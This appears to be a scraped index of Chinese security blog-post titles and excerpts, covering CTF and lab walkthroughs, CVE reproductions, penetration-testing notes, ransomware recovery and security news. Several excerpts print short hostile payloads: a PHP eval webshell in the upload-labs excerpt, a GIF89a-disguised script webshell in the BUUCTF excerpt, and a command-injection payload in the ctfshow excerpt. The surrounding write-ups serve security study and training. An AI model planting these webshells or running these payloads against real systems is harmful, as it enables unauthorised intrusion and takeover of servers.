文章目录 8.1 分布式爬虫的架构8.1.1 重点基础知识讲解8.1.2 重点案例：使用 Scrapy 和 Scrapy-Redis 构建分布式爬虫8.1.3 拓展案例 1：使用 Kafka 作为消息队列8.1.4 拓展案例 2：利用 Docker 容器化工作节点 8.2 分布式任务管理8.2.1 重点基础…

BUUCTF-Real-[ThinkPHP]IN SQL INJECTION

目录漏洞描述漏洞分析漏洞复现漏洞描述漏洞发现时间： 2018-09-04 CVE 参考：CVE-2018-16385 最高严重级别：低风险受影响的系统：ThinkPHP < 5.1.23 漏洞描述： ThinkPHP是一款快速、兼容、简单的轻量级国产P…

计算机服务器中了halo勒索病毒如何处理，halo勒索病毒解密数据恢复

网络技术的不断发展与应用，为企业的生产生活提供了极大便利，但网络数据安全威胁无处不在，近日，云天数据恢复中心接到某连锁超市求助，企业计算机服务器被halo勒索病毒攻击，导致计算机系统瘫痪，无…

beginCTF 2024 Web方向题解WP 全

king 题目描述：李华学习到了sql注入相关的知识，他觉得十分有趣，下去还自己找了一些靶场练手，拿掉几个题之后他信心大增，扬言自己是king of sqli，这时有师傅告诉他不仅有sql注入，还有nosql注入&…

《Python 网络爬虫简易速速上手小册》第7章：如何绕过反爬虫技术？（2024 最新版）

文章目录 7.1 识别和应对 CAPTCHA7.1.1 重点基础知识讲解7.1.2 重点案例：使用Tesseract OCR识别简单CAPTCHA7.1.3 拓展案例 1：使用深度学习模型识别复杂CAPTCHA7.1.4 拓展案例 2：集成第三方 CAPTCHA 解决服务 7.2 IP 轮换与代理的使用7.2.1 重…

红队打靶练习:HEALTHCARE: 1

目录信息收集 1、arp 2、nmap 3、nikto 4、whatweb 目录探测 1、gobuster 2、dirsearch WEB web信息收集 gobuster cms sqlmap 爆库爆表爆列爆字段 FTP 提权信息收集本地提权信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Inte…

网络安全产品之认识防非法外联系统

文章目录一、什么是防非法外联系统二、非法外联的安全风险三、防非法外联系统的工作原理四、防非法外联系统的主要功能五、防非法外联系统的使用方式六、非法外联与准入控制有什么区别？ 非法外联是指计算机或其他内部网络设备在未经授权的情况下私自连接到外部网络…

安全刷写简单说明

文章目录 1.安全刷写的目的2.安全刷写的实现3.安全刷写的要求4.签名说明5.刷写过程 1.安全刷写的目的为了避免ECU被恶意篡改数据，从而导致ECU功能失效。 2.安全刷写的实现目前很多厂商会使对软件进行签名操作，从一定程度上实现安全刷写的目的。 3.…

西方网络安全人才培养的挑战及对策

文章目录前言一、网络安全人才力量发展现状（一）注重从战略上重视网络安全人才培养和发展。（二）注重从多渠道多路径招募网络安全人才。（三）注重分层次分阶段系统规划网络安全人才培养模式。（四）注重通过实践锻炼进一步提升网络攻防实战能力。二、网络安全人才面临的形势…

【Java反序列化】Shiro-550漏洞分析笔记

目录前言一、漏洞原理二、Shiro环境搭建三、Shiro-550漏洞分析解密分析加密分析四、URLDNS 链前言 shiro-550反序列化漏洞大约在2016年就被披露了，在上学时期也分析过，最近在学CC链时有用到这个漏洞，重新分析下并做个笔记&…

微软警告：APT29间谍攻击猖狂；思科关键漏洞允许黑客远程接管统一通信系统；Jenkins漏洞远程代码执行攻击| 安全周报0126

1. 微软警告：针对全球组织的APT29间谍攻击正在扩大注：APT29是一个与俄罗斯情报机构有关的黑客组织，也被称为Cozy Bear、The Dukes或Office Monkeys。该组织以针对政府机构、外交实体、智库、国防承包商、能源、航空航天、科研、IT公司以及其…

项目解决方案：市小区高清视频监控平台联网整合设计方案(下)

目录一、项目需求 1.1业务需求 1.2技术需求 1.3环境要求 1.3.1硬件要求 1.3.2 技术支持服务要求二、总体系统架构 2.1．系统原理图 2.2．系统集成方式 2.3．系统集成协议三、基础平台功能 3.1常规功能模块 3.1.1 实时视频监控 1、集中显示 2、…

Kasseika勒索软件部署BYOVD攻击，滥用PsExec和利用Martini驱动程序

2023年，勒索软件组织发起的自带漏洞驱动程序（BYOVD）攻击不断增加，其中Kasseika勒索软件是最新加入这一趋势的组织之一。继Akira、BlackByte和AvosLocker之后，Kasseika也开始使用这种策略来终止反病毒进程和服务以部署勒…

全程云OA未授权访问+SQL注入漏洞复现 [附POC]

文章目录全程云OA未授权访问+SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现全程云OA未授权访问+SQL注入漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利…

五.实战软件部署 1-3实战章节-前言MYSQL 5.7版本在centos系统安装MYSQL 8.0版本在centos系统安装

目录五.实战软件部署 1-实战章节-前言五.实战软件部署 2-MYSQL 5.7版本在centos系统安装 1-配置yum仓库 2-使用yum安装mysql 3-安装完成后，启动mysql并配置开机自启动 4-检查mysql的运行状态 --配置 1-获取mysql的初识密码 2-登录mysql数据库系统 3-修改…

Vulnhub靶场 DC-8

目录一、环境搭建二、信息收集 1、主机发现 2、指纹识别三、漏洞复现 1、SQL注入 sqlmap工具 2、dirsearch目录探测 3、反弹shell 4、提权 exim4 5、获取flag 四、总结一、环境搭建 Vulnhub靶机下载： 官网地址：https://download.vulnhub.com/dc/DC-…

思科模拟器实验合集

目录实验一常用网络命令的使用.................................... 1 实验二双绞线制作.................................................. 12 实验三网络模拟软件.............................................. 15 实验四交换机基本配置..................…

ctfshow——命令执行

文章目录 web 29——通配符*绕过web30——调用其他命令执行函数web 31——参数逃逸web 32-web 36——配合文件包含伪协议web 37-web 39——文件包含web 40—— web 29——通配符*绕过 i不区分大小写，直接?csystem(tac fl*.php); web30——调用其他命令执行函数调用…

AD域国产替代方案，助力某金融企业麒麟信创电脑实现“真替真用”

近期收到不少企业客户反馈采购的信创PC电脑用不起来，影响信创改造的进度。例如，某金融企业积极响应国产化信创替代战略，购置了一批麒麟操作系统电脑。分发使用中发现了如下问题： • 当前麒麟操作系统电脑无法做到统一身份认证&…

【华为 ICT HCIA eNSP 习题汇总】——题目集14

1、以下哪种攻击不属于网络层攻击？ A、IP 欺骗攻击 B、Smurf 攻击 C、ARP 欺骗攻击 D、ICMP 攻击考点：网络安全解析：（C） IP 欺骗攻击是通过伪造源 IP 地址，冒充计算机与服务器进行通信，从而达…

网络空间内生安全数学基础（2）——编码信道数学模型

目录 （零）这篇博客在干什么（一）内生安全与香农信道编码定理（二）基本定义（三）编码信道存在定理（三.壹）编码信道存在第一定理（三.贰）编码…

[WUSTCTF2020]朴实无华（特详解）

一开始说header出问题了就先dirsaerch扫一遍发现robot.txt 访问一下去看看，好好好，肯定不是得他一开始说header有问题，不妨抓包看看，果然有东西访问看看，乱码修复一下，在之前的博客到过 <img src…

云安全的基本概念（基本目标与指导方针）

目录一、云安全概念概述 1.1 概述二、云安全的基本目标 2.1 安全策略开发模型 2.1.1 信息安全三元组 2.1.1.1 保密性(Confidentiality) 2.1.1.2 完整性(Integrity) 2.1.1.3 可用性(Availability) 2.1.2 信息安全三元组的局限性 2.2 其他信息安全属性 2.2.1 真实性 …

CVE-2018-19518 漏洞复现

CVE-2018-19518 漏洞介绍 IMAP协议（因特网消息访问协议）它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息，下载邮件等。它运行在TCP/IP协议之上，使用的端口是143。在php中调用的是imap_open函数。 PHP 的…

《CSS 简易速速上手小册》第5章：CSS 动画与过渡（2024 最新版）

文章目录 5.1 CSS 过渡基础：网页的微妙舞步5.1.1 基础知识5.1.2 重点案例：按钮悬停效果5.1.3 拓展案例 1：渐变显示导航菜单5.1.4 拓展案例 2：动态调整元素大小 5.2 关键帧动画：编排你的网页芭蕾5.2.1 基础知识5.2.2 重…

CVE-2012-1823 漏洞复现

CVE-2012-1823 PHP SAPI 与运行模式首先，介绍一下PHP的运行模式。下载PHP源码，可以看到其中有个目录叫sapi。sapi在PHP中的作用，类似于一个消息的“传递者”，比如在《Fastcgi协议分析 && PHP-FPM未授权访问漏洞 &…

自动化AD域枚举和漏洞检测脚本

linWinPwn 是一个 bash 脚本，可自动执行许多 Active Directory 枚举和漏洞检查。该脚本基于很多现有工具实现其功能，其中包括：impacket、bloodhound、netexec、enum4linux-ng、ldapdomaindump、lsassy、smbmap、kerbrute、adidnsdump、certip…

跨站请求伪造 CSRF 漏洞原理以及修复方法

漏洞名称：跨站请求伪造（CSRF） 漏洞描述： 跨站请求伪造攻击，Cross-Site Request Forgery（CSRF），攻击者在用户浏览网页时，利用页面元素（例如img的src&#xf…

攻防世界——re2-cpp-is-awesome

64位我先用虚拟机跑了一下这个程序，结果输出一串字符串flag ——没用 IDA打开后 F5也没有什么可看的那我们就F12查看字符串找可疑信息这里一下就看见了 __int64 __fastcall main(int a1, char **a2, char **a3) {char *v3; // rbx__int64 v4; // rax__int64 v…

upload-labs文件上传漏洞靶场

第一关 <?php eval ($_POST[123]);?>发现他这个是通过客户端前端写了一个限制我们禁用srcipt即可蚁剑成功打开第二关我们上传文件2.php它提示我们文件类型不正确我们可以联想到做了后缀检测我们通过burp抓包修改后缀第三关我们上传一个.php文件不可上…

蓝牙BLE学习-GAP

1.概述 GAP层（Generic access profile-通用访问配置文件）。GAP是对LL层payload（有效数据包）如何进行解析的两种方式的一种，而且也是最简单的一种。GAP简单的对LL payload进行一些规范和定义，因此GAP能实现的…

网络渗透测试：Wireshark抓取qq图片

Wireshark Wireshark Downloadhttps://www.wireshark.org/download.html 简介 WireShark是非常流行的网络封包分析工具，可以截取各种网络数据包，并显示数据包详细信息。常用于开发测试过程中各种问题定位。本文主要内容包括： 1、Wireshar…

【转载】企业资产收集与脆弱性检查工具

简介云图极速版是针对拥有攻击面管理需求的用户打造的 SaaS 应用，致力于协助用户管理互联网资产攻击面的 SaaS 化订阅服务产品。可实现对备案域名、子域名、IP、端口、服务、网站、漏洞、安全风险等场景进行周期性监控，支持多维度分析攻击面。利用可视化…

一些内网渗透总结

windows命令收集信息收集: 查看系统版本和补丁信息: systeminfo 查看系统开放端口: netstat -ano 查看系统进程: tasklist /svc 列出详细进程: tasklist /V /FO CSV 查看ip地址和dns信息: ipconfig /all 查看当前用户: whoami /user 查看计算机用户列表: net user 查看计算机…

勒索DASH币CrySiS最新变种的同源分析

前言 CrySiS勒索病毒，又称为Dharma勒索病毒，首次出现于2016年，2017年5月此勒索病毒万能密钥被公布之后，导致此勒索病毒曾消失过一段时间，不过随后该勒索病毒就开发了它的最新的一款变种样本，并于2018年开始…

权限提升：利用Linux错配提权

目录 Linux权限基础 Linux用户权限 Linux文件权限特殊的Linux文件权限 Linux本机信息收集 Linux错配提权 crontab计划任务提权 SUID提权 Linux权限基础 Linux用户权限在Linux中，根据权限的不同，大致可以分为三种：超级用户&#x…

2023年中国网络安全产业发展态势

文章目录前言一、需求依然增长，市场竞争加剧二、产业增速放缓，融资市场降温三、产业结构变革，优化整合途径（一）电信运营商快速入场，互联网厂商加速网络安全领域布局。（二）网络安全商业模式在发生变化，网络安全运营服务、托管服务模式正在逐渐被客户认同。（三）国内安…

计算机服务器中了360后缀勒索病毒怎么办？360后缀勒索病毒处理流程

网络技术的不断应用与发展，为企业的生产运营提供了有利保障，越来越多的企业走向数字化办公模式，并且企业的发展离不开数据支撑，重视数据安全成为了众多企业关心的主要话题。春节前后，云天数据恢复中心接到很多企业的求…

内网横向渗透-1

目录内网横向渗透流量监听工具的使用 ARP欺骗工具使用服务密码攻击 hydra medusa ncrack hashcat 内网横向渗透流量监听工具的使用 ARP欺骗工具使用 ettercap 工具可以进行arp欺骗、DNS欺骗，网络钓鱼等等！ driftnet -i eth0 可以用来…

[CTF]-PWN:C++文件更换libc方法（WSL）

C文件与C文件更换libc有很多不一样的地方，我是在写buu的ciscn_2019_final_3才意识到这个问题，C文件只需要更换libc和ld就可以了，但是C文件不同，除了更换libc和ld，它还需要更换libstdc.so.6和libgcc_s.so.1 更换libc和…

[BUUCTF]-PWN:ciscn_2019_es_1解析(tcachebin duf)

查看保护再查看ida 大致为alloc创建堆块，free释放堆块，show输出堆块内容但是要注意一点free没有清空堆块指针完整exp： from pwn import* from LibcSearcher import* pprocess(./es1) premote(node5.buuoj.cn,26841)def alloc(size,cont…

针对某终端安全自检钓鱼工具的分析

前言朋友微信找到我，说某微信群利用0day通告进行钓鱼，传播名为“终端安全自检工具”的恶意文件，然后还给了两个IP地址，如下： 咱们就来详细看看这个工具吧。样本信息拿到样本，样本的图标，如…

2024HVV | 12款开源渗透测试工具（非常详细）零基础入门到精通，收藏这一篇就够了

回顾过去，黑客入侵异常困难，需要大量手动操作。然而，如今，一套自动化测试工具让渗透测试人员变身“半机械人”，能够比以往任何时候都更轻松地完成更多测试。以下12款开源渗透测试工具，可以帮助渗透测试人员…

测试物理网络的ping命令

通过发送Internet控制消息协议（ICMP）并接收其应答，测试验证与另一台TCP/IP计算机的IP级联通性、可达到性和名称解析的疑难问题主要TCP/IP命令。如果不带参数，ping将显示帮助。通过在命令提示符下输入“ping /？”命令&a…

【网络安全】什么样的人适合学？该怎么学？

有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题： 什么样的人适合学习网络安全？我适不适合学习网络安全？ 当然，产生这样的疑惑并不奇怪，毕竟网络安全这个专业在2017年才调整为国家一级…

对称密钥的分配、公钥的分配

目录密钥分配 1 对称密钥的分配 KDC 对会话密钥 KAB 的分配对称密钥分配协议：Kerberos 2 公钥的分配认证中心 CA (Certification Authority) 数字证书 (digital certificate) 已签名的 B 的数字证书的产生过程 X.509 数字证书认证系统证书链证书…

CVE-2022-24652 漏洞复现

CVE-2022-24652 开题后台管理是thinkphp的，但是工具没检测出漏洞。登陆后界面如下，上传头像功能值得引起注意这其实就是CVE-2022-24652，危险类型文件的不加限制上传，是文件上传漏洞。漏洞路由/user/upload/upload 参考文章&a…

渗透测试练习题解析 4（CTF web）

1、[GXYCTF2019]禁止套娃 1 考点：git 泄露进入靶场后只有一串文字，源代码、抓包之类的都没有敏感信息出现，直接用 kali 的 dirsearch 扫描发现存在 .git 目录，猜测应该是源码泄露，使用 GitHack 扒一下源码&#xff0…

3个密码学相关的问题

一、离散对数问题（Discrete Logarithm Problem, DLP） 问题描述：给定有限阿贝尓群 G中的2个元素a和b，找出最小的正整数x满足：b a ^^ x （或者证明这样的x不存在）。二、阶数问题（O…

工具开发-SharpZipAES 用于压缩和加密文件，以缩短传输时间

免责声明：本工具仅供安全研究和教学目的使用，用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任，且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规，并理解并同意本声明…

雷池社区版WAF：开源护网，共筑网络安全长城

雷池社区版WAF（Web Application Firewall）是一款开源的网络应用防火墙，旨在为网站和网络应用提供安全防护，以抵御各种网络攻击，如SQL注入、跨站脚本攻击（XSS）、文件包含、以及其他常见的安全威胁…

数据安全治理实践路线（上）

基于以上数据安全治理实践理念，可以按照自顶向下和自底向上相结合的思路推进实践过程。一方面，组织自顶向下,以数据安全战略规划为指导,以规划、建设、运营、优化为主线，围绕构建数据安全治理体系这一核心，从组织架构、制度流程、…

Positive Technologies 确保 Rostic‘s 网络应用程序的安全

☑️ PT BlackBox分析 Rostics 网络应用程序的安全性快餐连锁店在其安全网络开发过程中使用了我们的扫描仪。PT BlackBox 总共扫描了 20 多个 Rostics 的外部服务（每天访问量超过 100,000 人次）和企业服务（每天访问量≈7,000 名员工&#x…

10、内网安全-横向移动域控提权NetLogonADCSPACKDC永恒之蓝

用途：个人学习笔记，有所借鉴，欢迎指正！ 背景： 主要针对内网主机中的域控提权漏洞，包含漏洞探针和漏洞复现利用。 1、横向移动-系统漏洞-CVE-2017-0146（ms17-010，永恒之蓝&#xff0…

每天学习2小时——黑客（网络安全）技术

有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题： 什么样的人适合学习网络安全？我适不适合学习网络安全？ 当然，产生这样的疑惑并不奇怪，毕竟网络安全这个专业在2017年才调整为国家一级学…

构建企业数据安全的根基：深入解析数据安全治理能力评估与实践框架

随着数字化转型深入各行各业，数据安全已成为企业不可或缺的重要议题。在这一背景下，有效的数据安全治理框架成为确保企业数据安全的基石。一、数据安全治理框架中国互联网协会于 2021 年发布 T/SC-0011-2021《数据安全治理能力评估方法》&#xff0c…

pikachu靶机-XSS

XSS： XSS（跨站脚本）概述 Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写"CSS"冲突，故又称XSS。一般XSS可以分为如下几种常见类型： 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; …

企业网络安全自查：总结报告与改进指南

按照网络和数据安全监督检查工作的要求， 现将网络信息安全自查阶段有关情况总结如下： 一、自查工作的组织开展情况我单位始终高度重视网络与信息安全自查工作， 成立专项管理组织机构，深入学习贯彻相关文件精神，严格…

SQL注入：网鼎杯2018-unfinish

目录使用dirmap扫描使用dirsearch扫描使用acunetix扫描爆破后端过滤的字符绕过限制获取数据这次的进行SQL注入的靶机是：BUUCTF在线评测进入到主页面后发现是可以进行登录的，那么我们作为一个安全人员，那肯定不会按照常规的方式来…

信息安全管理与评估赛题解析-通信数据（含环境）

通信数据分析文章目录通信数据分析1.pcapng：被入侵主机的IP是？被入侵主机的口令是？用户目录下第二个文件夹的名称是？/etc/passwd中倒数第二个用户的用户名是？2.pcapng：服务器自带的后门文件名是什么？服务器的内网IP是多少？攻击者往服务器中写入的key是什么？相关资源…

SICTF Round#3 wp web

web hacker sql无列名注入； 提示查询username参数，flag在flag表中； 传参测试发现，union select 可用，空格被过滤可以使用/**/代替 ，or也被过滤了且无法大小写、双写等绕过，导致无法查询flag表…

CVE-2016-3088（ActiveMQ任意文件写入漏洞）

漏洞描述 1、漏洞编号：CVE-2016-3088 2、影响版本：Apache ActiveMQ 5.x~5.13.0 在 Apache ActiveMQ 5.12.x~5.13.x 版本中，默认关闭了 fileserver 这个应用（不过，可以在conf/jetty.xml 中开启）；…

SICTF Round#3 Web方向题解WP

100％_upload 题目描述：小茂夫说：一直上传恶意文件尊嘟要生气了，世事莫固守，转变思路求突破开题，注意有个文件包含题目把后缀过滤死了，无法上传php后缀文件。文件内容些许过滤，短…

Java集合框架-1

目录 List集合常见方法迭代器（Iterator） List集合特有方法 List 的特点创建 List 遍历List Java集合框架是Java编程语言提供的各种数据结构和算法的实现。它提供了不同类型的集合类，如列表(List)、集(Set)、映射(Map)等&#xff0c…

剪辑视频调色软件有哪些剪辑视频软件哪个最好剪辑视频怎么学剪辑视频的方法和步骤会声会影2024 会声会影视频制作教程

看了很多调色教程，背了一堆调色参数，可最终还是调不出理想的效果。别再怀疑自己了，不是你的剪辑技术不行，而是剪辑软件没选对。只要掌握了最基本的调色原理，一款适合自己的视频剪辑软件是很容易出片的。有关剪辑视频…

第六十四天服务攻防-框架安全CVE复现Apache shiroApache Solr

第六十四天服务攻防-框架安全&CVE复现Apache shiro&Apache Solr 知识点：中间件及框架列表： IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic.JBoos,WebSphere, Jenkins,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring, Flask,jQuery等 1、开发框…

自学黑客的这些坑千万别踩，不然就是在做无用功！

一、自学网络安全学习的误区和陷阱 1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习一般来说，学习编程不但学习周期长，而且实际向安全过渡后可用到的关键知识并不多一般人如果想要把编程学好再开始学习网络安全往…

【论文阅读】ICCV 2023 计算和数据高效后门攻击

文章目录一.论文信息二.论文内容1.摘要2.引言3.主要图表4.结论一.论文信息论文题目： Computation and Data Efficient Backdoor Attacks（计算和数据高效后门攻击） 论文来源： 2023-ICCV（CCF-A） 论文团…

入侵检测系统的设计与实现

入侵检测系统（Intrusion Detection System，简称IDS）是一种能够监视网络或计算机系统活动的安全工具，旨在识别并响应可能的恶意行为或安全事件。这些事件可能包括未经授权的访问、恶意软件、拒绝服务攻击等。入侵检测系统通过不同的…

如何解决DNS解析错误故障

DNS解析错误会导致将一个域名解析为错误的IP地址，或者根本无法确定某个域名对应的IP地址，从而无法通过域名访问相应的站点，形成DNS解析故障。最常见的症状是访问站点对应的IP地址没有问题，但访问其域名时却出现错误。 DNS解析异常…

Sqli-labs靶场第11关详解[Sqli-labs-less-11]

Sqli-labs-Less-11 前言： SQL注入的三个条件： ①参数可控；（从参数输入就知道参数可控） ②参数过滤不彻底导致恶意代码被执行；（需要在测试过程中判断） ③参数带入数据库执行。&…

SQL-Labs46关order by注入姿势

君衍. 四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入7、盲注脚本四十六关 ORDER BY数字型注入请求方式注入类型拼接方式GET报错、布尔盲注、延时盲注ORDER BY $id 我们直接可以从界面中得知传参的参数为SORT&#x…

Spring综合漏洞利用工具

Spring综合漏洞利用工具工具目前支持Spring Cloud Gateway RCE(CVE-2022-22947)、Spring Cloud Function SpEL RCE (CVE-2022-22963)、Spring Framework RCE (CVE-2022-22965) 的检测以及利用，目前仅为第一个版本，后续会添加更多漏洞POC，以及…

SQL-Labs靶场“46-50”关通关教程

君衍. 一、四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入二、四十七关 ORDER BY单引号报错注入1、源码分析2、报错注入3、时间盲注三、四十八关 ODRER BY数字型盲注1、源码分析2、rand()盲注3、if语句盲注4、时间盲注…

buuctf_N1book_SQL注入-1

题目： 看眼URL，试了id1,id1’,id1’,其中唯有id1’是妹（没）有回显的大佬说这么作证明是有注点的（我在好奇要用SQLmap的话这步是必须得嘛？）。本题用工具SQLmap解题 1。payload： pyth…

【零基础入门】什么样的人适合学网络安全？该怎么学？

有很多想要转行网络安全或者选择网络安全专业的人在进行决定之前一定会有的问题： 什么样的人适合学习网络安全？我适不适合学习网络安全？ 到底什么样的人适合学习网络安全呢？（需要什么前提条件呢） 开门见山…

Linux快速修改ip地址

Linux修改IP配置一、查找ip配置文件 ifcfg-ens33二、编辑 vi ifcfg-ens33文件三、重启网络或者重启系统一、查找ip配置文件 ifcfg-ens33 cd /etc/sysconfig/network-scripts/ls //查看network-scripts文件夹下面的文件二、编辑 vi ifcfg-ens33文件 vi ifcfg-ens33注意&…

解决vulhub漏洞环境下载慢卡死问题即解决docker-valhub漏洞环境下载慢的问题

解决vulhub环境下载慢/卡当前环境为：ubuntu20 1.在 cd /etc/docker/目录下创建或修改daemon.json文件 sudo touch daemon.json编辑daemon.json文件 sudo vim daemon.json2.填写阿里云镜像地址： { "registry-mirrors":["https://6kx…

EAP-TLS实验之Ubuntu20.04环境搭建配置（FreeRADIUS3.0）（二）

上篇文章简要介绍了freeradius的搭建及配置，在最后数据库连接阶段还没进行测试验证，今天继续。修改相关文件 1 radiusd.conf 打开762行注释（＄INCLUDE mods-enabled/sql）； 2 sites-available/default …

Python爬虫之极验滑动验证码的识别

极验滑动验证码的识别上节我们了解了可以直接利用 tesserocr 来识别简单的图形验证码。近几年出现了一些新型验证码，其中比较有代表性的就是极验验证码，它需要拖动拼合滑块才可以完成验证，相对图形验证码来说识别难度上升了几个等级。本节将…

RCE (Remote ????? execution) ---＞CTF

看这个标题就知道今天的内容不简单！！！！ 那么就来讲一下我们的RCE吧目录编辑 1. &？ |？ ||？ &&？ 2.PHP命令执行函数&& ||"" 1."" &…

access数据库泄露与IIS短文件名利用

access数据库 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统它的数据库是没有库名的，都是表名。 (借用别的up的图)是不是感觉有点像excel access数据库的后缀是.mdb access数据库泄露漏洞如果…

Python爬虫-付费代理推荐和使用

付费代理的使用相对免费代理来说，付费代理的稳定性更高。本节将介绍爬虫付费代理的相关使用过程。 1. 付费代理分类付费代理分为两类： 一类提供接口获取海量代理，按天或者按量收费，如讯代理。一类搭建了代理隧道&#xff0…

详细了解网络通信流程、协议组成、编码方式、数据传输方式和途径、Http 协议的编码、cookie的使用和提取路径

详细了解网络通信流程、协议组成、编码方式、数据传输方式和途径、Http 协议的编码、cookie的使用和提取路径。一、网络通信简介现代的网络传输介质以以太网链路居多，完整的网络数据报结构大致如下。传输层及其以下的机制由操作系统内核提供，应用层由用户进程提供，应用程…

DDoS安全防护是如何实现流量防盗刷

DDoS攻击是一种网络攻击方式，攻击者通过向目标服务器发送大量无效请求，导致服务器资源耗尽，无法正常对外提供服务。而DDoS安全防护是针对这种攻击方式的一种防护措施，其中流量防盗刷是其中的一个重要环节。下面将从几个方面来详细…

HUAWEI 华为交换机配置基于VLAN的MAC地址学习限制接入用户数量配置示例

组网需求如图 2-15 所示，用户网络 1 通过 LSW1 与 Switch 相连， Switch 的接口为 GE0/0/1 。用户网络2通过 LSW2 与 Switch 相连， Switch 的接口为 GE0/0/2 。 GE0/0/1 、 GE0/0/2 同属于 VLAN2。为控制接入用户数，对 VLAN2 进…

SLA 是什么？如何实现 SLA 管理

随着业务的不断壮大，为了满足日益增长的客户需求，网络必须保持与这些需求同步。同时，为了提高最终用户的体验，运维人员/网络管理员在监控企业级网络时遇到了不少瓶颈，必须不断审查网络，以确保提供的服务质量…

服务器机房安全守护：五大物理安全实践

服务器机房是数字企业的心脏。无论是企业家还是经验丰富的IT专业人员，都知道服务器机房的安全性至关重要。如果没有采用适当的物理安全措施，其服务器很容易受到盗窃、人为破坏和自然灾害的破坏。在保护服务器机房的领域内，需要采用多方面的…

5.WEB渗透测试-前置基础知识-常用的dos命令

内容参考于： 易锦网校会员专享课上一篇内容：4.WEB渗透测试-前置基础知识-快速搭建渗透环境（下）-CSDN博客常用的100个CMD指令 1.gpedit.msc—–组策略 2. sndrec32——-录音机 3. Nslookup——-IP地址侦测器 ，是一个…

第七十天 APP攻防-微信小程序解包反编译数据抓包APK信息资源提取

第70天 APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取知识点： 0、APK信息资源提取 1、微信小程序致据抓包 2、做信小程序解包反编译 1、信息收集应用8资产提取&权限等 2、漏润发现-反编泽&脱壳&代码审计 3、安全评估组件8散密…

一款云渗透工具 - Sea Moon

SeaMoon - 月海什么是月海 🌕 月出于云却隐于海月海(Sea Moon) 是一款 FaaS/BaaS 实现的 Serverless 网络工具集，期望利用云原生的优势，实现更简单、更便宜的网络功能。月海之名取自于苏轼的《西江月顷在黄州》，寓意月海取自…

CDN原理探究

来源于百度： https://baike.baidu.com/item/%E5%86%85%E5%AE%B9%E5%88%86%E5%8F%91%E7%BD%91%E7%BB%9C/4034265?frge_ala 通过上图，我们可以了解到，使用了CDN缓存后的网站的访问过程变为： 用户向浏览器提供要访问的域名&#xff…

ctfshow——反序列化

文章目录 web 254——啥也没web 255——反序列化对变量进行赋值（1）web 256——反序列化对变量进行赋值（2）web 257——对象注入web 258——对象注入(绕过preg_match)web 259 web 254——啥也没这里就是使用GET传输，use…

kswapd0挖矿病毒攻击记录

文章目录一、起因与病毒分析1、起因2、阿里云告警2.1 恶意脚本代码执行12.2 恶意脚本代码执行22.3恶意脚本代码执行32.4 恶意脚本代码执行4 3、病毒简单分析3.1 病毒的初始化3.2 病毒本体执行 4、总结二、ubuntu自救指南1、病毒清理2、如何防御一、起因与病毒分析 1、起因 …

Windows域服务基础

文章目录前言Windows Sever；*为重点 Windows域环境： 一、概念。二、掌握方法总结前言 Windows Sever；*为重点 Windows域环境： 提示：以下是本篇文章正文内容，下面案例可供参考一、概念。 1.域和活动目…

我劝你千万不要学黑客技术，为什么？

如果你是计算机专业的学生，那么劝你不要学黑客技术，我怕下次见到你是在橘子里。学了黑客技术以后可以干什么？如果你只是会使用一些简单的黑客工具敲敲代码，那就只能在学校里秀一下技术但如果你学会了网络渗透和提权等技术&…

网络安全概述（一）

目录资产保护资产的类型资产损失类型资产保护考虑因素安全强度、安全代价和侵入可能性的关系信息安全技术发展单机系统的信息保密阶段信息保障阶段信息保障技术框架IATF PDRR模型网络攻击类型阻断攻击、截取攻击、篡改攻击、伪造攻击被动攻击和主动攻…

智能汽车软硬件产品CES展示汽车技术新亮点

智能汽车是汽车产业发展的新趋势，是未来汽车发展的必然方向。智能汽车是指搭载了先进的传感器、控制器、执行器等部件，并融合了人工智能、自动驾驶等技术，能够实现部分或完全自动驾驶、智能网联等功能的汽车。近年来，智能汽车技…

Gophish+EwoMail 自建钓鱼服务器

GophishEwoMail 自建钓鱼服务器文章目录 GophishEwoMail 自建钓鱼服务器1.前提准备2.搭建EwoMail邮件服务器1）Centos7 防火墙操作2）设置主机名3）host配置4）安装EwoMail5）获取DKIM6）端口服务介绍7&#xff…

OSCP靶场--Squid

OSCP靶场–Squid 考点(1.squid代理绕过 2.phpmyadmin写webshell 3.受限服务账户【LOCAL SERVICE或NETWORK SERVICE】恢复特权 4.SeImpersonatePrivilege提权) 1.nmap扫描 ## ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -sC -p- 192.168.188.189 --min-rate 2000 Starti…

Sqli-labs靶场第20关详解[Sqli-labs-less-20]自动化注入-SQLmap工具注入

Sqli-labs-Less-20 通过测试发现，在登录界面没有注入点，通过已知账号密码admin，admin进行登录发现： 登录后会有记录 Cookie 值设想如果在Cookie尝试加上注入语句（报错注入），测试是否会执行…

Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入

Sqli-labs-Less-19 通过测试发现，在登录界面没有注入点，通过已知账号密码admin，admin进行登录发现： 返回了Referer ，设想如果在Referer 尝试加上注入语句（报错注入），测试是否会执行…

BUUCTF---[极客大挑战 2019]Upload1

1.题目描述 2.点开链接，需要上传文件，要求是image，上传文件后缀为jpg的一句话木马，发现被检测到了 3.换另一个木马试试 GIF89a? <script language"php">eval($_REQUEST[1])</script> 发现可以上传成功 4…

Hackthebox - Authority

